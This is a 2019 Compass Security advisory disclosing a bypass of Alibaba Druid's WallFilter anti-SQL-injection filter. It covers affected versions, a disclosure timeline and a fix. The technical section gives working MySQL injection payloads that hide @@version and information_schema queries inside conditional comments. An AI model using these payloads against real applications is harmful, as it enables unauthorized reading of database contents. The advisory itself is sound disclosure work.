#############################################################
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#############################################################
#
# Product:  Alibaba Druid [1]
# CSNC ID:  CSNC-2019-022
# Subject:  Anti SQL Injection Filter Bypass
# Risk:     High
# Effect:   Remotely exploitable
# Authors:  Emanuele Barbeno and Lukasz D. (advisories@compass-security.com)
# Date:     02.09.2019
#
#############################################################

Introduction:
-------------

Druid is one of the best database connection pools written in Java. Druid provides powerful monitoring functionalities and more. Druid provides WallFilter, which is based on SQL semantic analysis to defend against SQL injection attacks. [2]

WallFilter was found to be insufficient in preventing SQL injection attacks, as its filtering mechanism can be bypassed. The bypass allows an attacker to access all schemas and variables that are normally blocked by WallFilter.

Affected:
---------

The following Druid versions are vulnerable:

- 1.0.0 - 1.1.19

Technical Description:
----------------------

Assume that an application uses the following MySQL query:

SELECT name, surname FROM users WHERE name=''

where unescaped user input is inserted between the quotes.

If the attacker inputs:

' UNION SELECT @@version, 'string1

the resulting query is blocked by WallFilter with the following exception:

"sql injection violation, variable not allow : @@version"

If the attacker inputs:

' UNION SELECT (select table_name FROM information_schema.tables limit 1,1), 'string1

the resulting query is blocked by WallFilter with the following exception:

"sql injection violation, deny schema : information_schema"

However, WallFilter can be bypassed with a slight modification of the input, wrapping the blocked expression in a MySQL conditional comment (/*! ... */), which MySQL executes as SQL but the filter does not analyse:

' UNION SELECT /*! @@version,*/ 'string1

' UNION SELECT /*! (select table_name FROM information_schema.tables limit 1,1),*/ 'string1

The bypass works even if WallFilter is configured to disallow MySQL hints.

Workaround / Fix:
-----------------

It needs to be ensured that applications using Druid for accessing MySQL databases do not rely on WallFilter only, but also handle user input with sufficient care (for example, by using parameterized queries) in order to prevent SQL injection vulnerabilities.

Timeline:
---------

2019-06-20: Vulnerability discovered
2019-06-24: Initial vendor notification
2019-08-28: Patched version released [3]
2019-09-02: Public disclosure

References:
-----------

[1]: https://github.com/alibaba/druid
[2]: https://github.com/alibaba/druid/wiki/FAQ
[3]: https://github.com/alibaba/druid/commit/df7ef2fd663c7c717dc919cf298cf69af0cb56eb